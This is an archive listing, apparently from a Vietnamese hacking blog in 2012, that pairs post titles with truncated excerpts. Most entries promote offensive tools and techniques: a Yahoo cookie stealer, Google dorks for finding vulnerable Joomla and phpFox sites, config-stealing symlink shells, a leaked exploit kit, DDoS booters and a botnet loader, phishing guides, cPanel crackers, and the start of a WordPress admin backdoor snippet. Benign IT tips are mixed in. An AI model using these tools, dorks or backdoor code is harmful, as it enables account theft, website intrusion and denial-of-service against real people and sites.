J2TEAM Security: A must-have extension for Chrome users. Install now!
tháng 11 2012

Hack Yahoo Accounts easily, 2012

1. Download the required Cookie Stealer Script from here http://freakshare.com/files/cjflnpra/yahoo-cookie-stealer-by-wildhacker.com.rar.html  …

Joomla Shell Upload Vulnerability

requirements: 1.mind use this google dork to find vulnerable joomla sites ##  google dork : inurl:index.php?option=com_fabrik after open the si…

PhpFox 3.0.1 Cross Site Scripting (XSS)

Google Dork: Intext:"Powered By phpFox Version 3.0.1" Vendor Home : http://www.phpfox.com/ There are lots of parametrs Vulner…

CONFIGURATION File Killer Symlink Shell

This is a CONFIGURATION File Killer Symlink Shell  coded by a member of Team Indishell. It is fully automated php shell and symlinks all the config f…

Cloudflare IP resolver [python]

CloudResolver is a python script designed to find the ip address of a server hidden behind cloudflare. The script uses the following methods to d…

FACEBOOK BOMBER

#!user/bin/python #Coded Just For Fun from urllib import urlretrieve import imp import os, time if os.name == 'nt': os.system('…

XSS Injection Via SQLi Vulnerability

# XSS Injection Using SQL Injection Vulnerability # Trick is based on Hexa Decimal Encoding. [0x01] You got SQLi vulnerability in website http:…

[Guide] Remote Code Execution

Remote Code Execurion is another common web vulnerability that I will be telling you about. It exists in a while range of websites. It allows you, …

[Video TUT] Remote Code Execution vbullentin 4.1.10 Exploit

Greetings:Pirjo(iranian black hat hacker),Team openfire,Team INTRA,team injectors and all hackers

Crimepack 3.1.3 Exploit kit Leaked, available for Download!

Part 1: Java Exploit As stated above, I focus on a malware that exploits a recent JRE vulnerability: CVE-2010-0840 to execute malicious files …

Gmail Hacking by Raj Chandel

Click To Download

Backtrack On Windows [via SSH]

Tools Required: 1) Putty 2) Xming Server 3) Vitrual Machine + BT

[Tutorial] Cross Site Request Forgery Attack

Cross Site Request Forgery Attack – Less known but dangerous Cross Site Request Forgery ( CSRF or XCRF) is one of the top 10 OWASP website vulne…

eBook - How to create Phishing site without Webhost, Using Data URI

How to create Phishing site without Webhost, Using Data URI By: Henning Klevjer Link : http://klevjers.com/papers/phishing.pdf

Owasp Xelenium - XSS Scanner

XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web applicati…

Sphpforum 0.4 Cross Site Scripting / SQL Injection

# Product: sphpforum # Version: 0.4 (older versions may be affected) # # Software Download: http://sourceforge.net/projects/sphpforum/ # Description:…

Ck_pyShell

Tool Name: Ck_pyShell Version: 1.1 Release: Beta Description: A Multipurpose Tool For Pen-Testing Coded With Python. Uses Various User Agent…

RR CPanel and WHM cracker By Team IndiShell

RR cracker is Advanced Version of Cpanel and WHM cracker. its Devloped by Indian Hacker and Php Devloper  3r0r1046. New Fuctions in RR Cpanel…

Smart Hunter v.1.4.3 Public Version

Download : http://adf.ly/FRrSF

Hướng dẫn "Hack lại Keylogger"

Hướng dẫn: Hack lại Keylogger Công cụ: Sniff Pass http://www.nirsoft.net/utils/password_sniffer.html Tutorial by Juno_okyo GhostClub's …

Share bộ giáo trình CEH Full v7 - Tiếng Việt

I/ Giới thiệu: Bộ giáo trình tài liệu về an ninh mạng được dịch lại hoàn toàn bằng tiếng việt từ bộ tiếng anh gốc + video demo cho mỗi chương. Bộ …

Share kho tài liệu mạng hữu ích

Tài liệu share gồm 1/ Bộ DVD CCNA được tập hợp của 3 trung tâm VNPRO, Nhất Nghệ và Sao Bắc Đẩu. Link download: http://www.fshare.vn/file/TN41231M…

Drupal 7.15 Path Disclosure Vulnerability

============================================================ Vulnerable Software: Drupal 7.15 Downloaded from: http://ftp.drupal.org/files/projects/d…

Mozilla Firefox Remote Denial of Service Vulnerability

Mozilla Firefox is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to make the affected computer unresp…

SQLCake - automatic SQL injection exploitation kit

What is sqlcake? sqlcake is an automatic SQL injection exploitation kit written in Ruby . It's designed for system administration and penetra…

Internet Explorer 9 Memory Corruption PoC Exploit

<?php /********************************************************** * Internet Explorer 9 Memory Corruption PoC Exploit * ******************…

Code PHP - lấy địa chỉ IP của người dùng

Code PHP, lấy địa chỉ IP của người dùng, Get Remote IP Address in PHP , get user ip address using php Đoạn code PHP này sẽ trả về IP đang gửi req…

Thủ thuật phá phách trong mạng LAN

Chuẩn bị : _ Backtrack 5 R3 (cái này cài lên máy ảo cho dễ xài). _ Trên windows các bạn có thể dủng cain & abel để làm điều tương tự nhưng có …

Share tài liệu Mạng - IT - Đợt 3

I/ Tài liệu đợt 3 : Link download tại đây: http://www.fshare.vn/folder/TXDCX6SB7T/ Pass download :longbaoitc

Siêu hacker

1. MPlayer, Google Chrome, VLC, MythTV... có chung điểm gì? Chúng đều xài thư viện FFmpeg. Rất nhiều phần mềm khác sử dụng thư viện này và có thể c…

[OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6]

Hey guys! I'm presenting my HTTP Bot called 'vnLoader' i was coding it about 1 year ago for a couple of months. I don't use it…

DaRKDDoSeR 5.6c Cracked

Download: http://www.mediafire.com/?3abooy322o5t8r8 Pass Unlock: junookyo

Decode PHP lockit encoded script

HELLO FRIENDS TODAY IM SHARING A VIDEO TUT ON DECODING PHP LOCKIT SOFT ENCODED SCRIPT IM SHOWING YOU E MANUAL WAY TO DO IT.. THINGS YOU REQUIRED…

Joomla Exploit (Code)

In this video you will learn how to hack joomla Note:- This exploit only works on old version of joomla

[Tutorial] Setting Up Ancient Booter

Hello guys today ill show you how to setup Web based Shell Booter Ancient Booter Things you'll need for this 1st. Cpanel 2nd. Ancien…

[xHydra] BruteForcing FTP - Website - Router con 14 Millones de Password

INTRODUCCIÓN : Según  OWASP  el Brute Forcing consiste en enumerar sistemáticamente todos los posibles candidatos para la solución y compr…

[PHP] Get list username - vBulletin

<?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $max_page = …

Share code get link download MediaFire

<?php if(isset($_GET['url'])){ $source = file_get_contents($_GET['url']);// Get source html của link mediafire $dl = exp…

Share tài liệu chuyên ngành Mạng - IT - Part 2

I/ Giới thiệu: Tiếp theo bộ tài liệu được share đợt 1. Hôm nay mình sẽ share cho các bạn bộ tài liệu đợt 2 này. II/ Nội dung: Nội dung của tài liệ…

Yii Framework - Search SQL Injection Vulnerability

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability # Google Dork: No Dork # Date: 20/11/2012 # Exploit Author: Juno_okyo # Vendor Ho…

WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting

WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting Software: WP e-Commerce Software Language: PHP Version: 3.8.9 and below Vendor Sta…

Wordpress Plugins Spotlight Your Upload Vulnerability

___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ______ …

Media Player Classic XSS / Denial Of Service

========================================================================================== MPC (Media Player Classic) WebServer Multiple Vulnerabilit…

Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # we…

IMMonitor Yahoo Messenger Spy v2.2.9.(Full)

IMMonitor Yahoo Messenger Spy cho phép bạn theo dõi, khoá lại hoặc ghi lại các đoạn đối thoại chat trên Yahoo Messenger từ xa. Nếu con cái bạn (…

SQL Injection - Useful Functions - Tutorial

Here are some useful function that you can use to speed up your injection and/or evade some WAFs. If group_concat() or concat() are not available (…

Exploiting Java Applet JAX-WS Remote Code Execution

Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada  Java Applet JAX-WS Remote Code Execution  descubierta por  @_juan_vaz…

vBulletin vBay <=1.1.9 Error-Based SQL Injection

#!/usr/bin/env python -W ignore::DeprecationWarning """ VBay <= 1.1.9 - Remote Error based SQL Injection …

Tội phạm lừa đảo - Phần VI: Đánh cắp nhận dạng

Bạn làm việc chăm chỉ cần mẫn hàng ngày chỉ với mong muốn kiếm sống nuôi lấy bản thân. Bạn phải hết sức dè sẻn trong chi tiêu hàng ngày, và bạn ch…

Tội phạm lừa đảo - Phần V: Rửa tiền (Phần tiếp theo)

Rửa tiền tham ô: Eddie Antar   Vào thập kỉ 80, Eddie Antar, chủ sở hữu của Crazy Eddie’s Electronics, đã lấy đi hàng triệu dollar của công ty v…

Tội phạm lừa đảo - Phần V: Rửa tiền

Tháng 10 năm 2005, Nghị sĩ Tom Delay của Mỹ bị buộc tội có liên quan tới một vụ án rửa tiền và rồi bị giáng chức xuống thành House Majority Leader…

Thay đổi User Agent mặc định của Firefox

1. Open file: C:\Documents and Settings\username\Application Data\Mozilla\Firefox\Profiles\3vfugy1g.default\prefs.js 2. Add the following line: …

[TUT] Back connect không cần Port Forwarding

Video Tutorial + Code + TXT hướng dẫn đều trong file RAR: Download: http://www.mediafire.com/?y9jhabsywx4d38h Pass Unlock: 8110cK1628r72uE

How to SQL Inject with SQLMAP on BackTrack 5

Facebook sửa lỗi bypass Password

Facebook vừa sửa lỗ hổng bảo mật vào cuối tuần qua và cho rằng nó có thể bị khai thác và có thể có trên 1 triệu tài khoản sẽ bị đăng nhập trái phép…

Brute, Crack password với Hashcat

Juno_okyo đã từng post 1 tools tương tự tại đây (OclHashcat): http://junookyo.blogspot.com/2012/05/oclhashcat-plus-v008-released-fastest.html Nhưn…

Share tài liệu chuyên ngành Mạng - IT

I/ Giới thiệu: Bộ tài liệu cung cấp các kiến thức cơ bản nhất về chuyên ngành mạng, tuy chưa đủ hết, nhưng nó sẽ cung cấp cho các bạn 1 lượng kiến …

Mod gather infomation victim khi đã có session (MSF)

Khi đã tạo được session trên máy victim nhưng lại muốn lấy 1 số thông tin nơi địa phương như lịch sử các ổ usb, list wifi nạn nhân đang hoạt động, …

WordPress Admin Access Backdoor

<?php add_action('wp_head', 'my_backdoor'); function my_backdoor() { If ($_GET['backdoor'] == 'go') { require…

Auto Rooting Script

Yes can someone upload autoroot.sh 2012 i have another working autoroot.pl here if anyone wants it

Cross-site Scripting Vulnerability in WordPress GD Star Rating Plugin

Vector: Remote Severity: Low Patch: Unpatched Impact: Cross-site Scripting (XSS) …

Biggest wordpress Exploit Library

Biggest wordpress Exploit Library:

WordPress Version Checker - MD5 Hash Method

WordPress Version Check provides you with an easy way of checking that which version your Victim is using. It is a simple php Script based upon…

Phemail.py: Phishing EMail Social Engineering Tool

Social Engineering is defined as the process of inducing people into giving away access or confidential information. From a security consultant…

[XSS] Exploit Google for Phishing attack

Lần trước khi Juno_okyo gửi email cảnh báo về XSS tại Google Transplate, phía Security của Google đã rep lại và không hề quan tâm đến exploit này vì …

Kỹ thuật Network Address Translation (NAT)

Hầu hết những người sở hữu một kết nối Internet hiện đại ngày nay đều phải sử dụng đến kỹ thuật NAT (Network Address Translation) . NAT đã là một p…

USB Booting for Windows, Linux, and others

Thấy nhiều bạn vẫn còn lăn tăn trong việc chọn chương trình để tạo Bootable USB đúng cách và hiệu quả, nên topic này mình sẽ tổng hợp các vấn đề về…

Fierce Domain Scan

Written by RSnake with input from id , Vacuum and Robert E Lee . A special thanks to IceShaman to porting it to use multi-threading. Fierce domai…

PHP - Những điều có thể bạn chưa biết

Thủ thuật khi lập trình PHP 1- Khi echo thay thế print: Echo luôn luôn hoạt động nhanh hơn print, vì echo không có return gì cả, trong khi print th…

vBulletin 3.0 Private Message HTML Injection Vulnerability

source: http://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occur du…

Devil May Cry - CrossFire UI Login

Download: http://www.mediafire.com/?1thbk43dbc16k1k

Một số website hỗ trợ học lập trình trực tuyến

Nếu bạn là sinh viên, nếu bạn mới bước vào con đường lập trình, hay nếu bạn là dân không chuyên thích khám phá và yêu thích lập trình… thì bạn ph…

Một số mẫu Regular Expressions

Regular Expressions xuất hiện một cách thường xuyên và gần như không thể thiếu với một lập trình viên chuyên nghiệp không chỉ trong PHP mà ở nhiều …

Share code Restore dữ liệu MySQL trên PHP

Trong bài trước tôi đã share một đoạn code đơn giản để backup dữ liệu trên MySQL . Trong bài này như đã hưa tôi sẽ share một đoạn code để thực hiệ…

Share code Backup dữ liệu MySQL trên PHP

Chào mọi người, để sao lưu database MySQL chúng ta có rất nhiều cách: Bạn có thể dùng PHPMyAdmin, một mã nguồn mở để sao lưu phục hồi, hoặc bạn có …

Thủ thuật vui với firefox

Firefox là một trong những trình duyệt tốt nhất thế giới và có một số thủ thuật thú vị mà bạn có thể làm với trình duyệt này. Những thủ thuật này…

Video + tool hack Wifi

http://www.mediafire.com/?n4n9g83u1iy24pf Nguồn: Sưu tầm.

Tìm hiểu hai chế độ CC và BCC khi gửi email

Trong các ứng dụng email, các bạn có thể dễ dàng nhận thấy hai dòng CC và BCC ngay dưới dòng địa chỉ người nhận. Nhiều người không sử dụng hai tín…

Tổng hợp 46 phím tắt hữu ích khi duyệt web

Các trình duyệt web phổ biến hiện nay như Firefox, Google Chrome, Internet Explorer, Safari hay Opera đều có một hệ thống các tổ hợp phím tắt giốn…

Tội phạm lừa đảo - Phần IV: Thủ đoạn trộm tiền từ thẻ ATM

Năm 2008, hơn 1 tỉ đô la đã bị cướp từ thẻ ATM. Tất nhiên, một vài tên cướp dùng cách truyền thống, phá vỡ lớp vỏ máy và lấy tiền đi, nhưng có nhữ…

10 tên tội phạm máy tính từng "làm khổ" cả thế giới (phần 2)

Nguy hiểm không kém, thậm chí là có phần hơn 5 tên hacker ở phần 1 , nhiều hacker dưới đây đã tham gia vào các mạng lưới khủng bố mạng Anonymous v…

10 tên tội phạm máy tính từng "làm khổ" cả thế giới (phần 1)

Ngay từ những ngày đầu tiên khi những chiếc máy tính ra đời từ cách đây hơn 50 năm, một loại tội phạm mới cũng theo đó mà xuất hiện: tội phạm máy…

Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit

#!/usr/bin/perl # Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net> # www.securitybydefault.com # Joomla <2.5.1 time based sql inje…

[Tutorial] Cài đặt và bảo mật cho Youtube

Bài viết này sẽ hướng dẫn bạn cài đặt và bảo mật cho tài khoản Youtube. Để vào phần cài đặt, bạn nhấn vào tên tài khoản và chọn "Cài đặt You…

Upload ảnh tự động, nhanh chóng với Photobucket

Với phần mềm Photobucket Desktop, bạn có thể dễ dàng upload ảnh một cách tự động. Tải phần mềm miễn phí tại đây .

Thủ thuật tạo status độc cho Facebook

Hướng dẫn tạo status "ẩn" cho Facebook:  Rất đơn giản, bạn chỉ cần copy đoạn mã sau vào status và post lên wall: @[0:0: ] Chú…

Các lỗi thường gặp khi viết mã HTML và CSS

Dưới đây là các lỗi thường gặp khi viết mã HTML & CSS mà bạn cần chú ý để có thể validate HTML và CSS.

Tổng hợp list password dùng cho brute force, crack

Link các trang chia sẻ: Sắp xếp theo thứ tự giảm dần về số lượng. http://www.skullsecurity.org/wiki/index.php/Passwords http://www.moehre.org/brut…

GIF Resizer (Resize gif file) – Thay đổi kích thước hình động Gif

Mọi cố gắng trong việc resize (thay đổi kích thước) một ảnh gif động đưa đến kết quả là một ảnh tĩnh. Tuy nhiên, phần mềm portable miễn phí GIF Res…

Khám phá những tính năng hữu dụng của Gmail

Có lẽ bạn đã nắm vững các tính năng cơ bản của dịch vụ Gmail như thiết lập danh bạ, gửi email... Tuy nhiên, Gmail còn nhiều …

Hướng dẫn sử dụng một số tính năng của Winrar

WinRAR là một phần mềm rất phổ biến, gần như được cài đặt trong mọi máy vi tính. Nhưng liệu bạn có biết điều gì khiến phần mềm này nổi tiếng …

The List of Function dangerous in PHP development

apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get…

Show saved password

Bạn không nên lưu trữ mật khẩu bằng tiện ích nhớ mật khẩu của trình duyệt bởi vì chỉ sau 3 bước cơ bản, tài khoản của bạn sẽ bị lộ mật khẩu:

MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

Bug cho forum sài MyBB với cái Albums plugin version 0.9 Tut: 1. Tạo cái user trên forum victim. 2. Tạo cái Album rồi upload hình lên. -> 2 bư…

MyBB Follower User Plugin SQL Injection

# Exploit Title: Follower User MyBB plugin SQL Injection 0day # Google Dork: intext:"Users subscribed to" inurl:member.php -site:fwcombie.…

Joomla Spider Catalog (index.php, product_id parameter) SQL Injection Vulnerability

1 ######################################### 1 0 I'm D4NB4R member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-…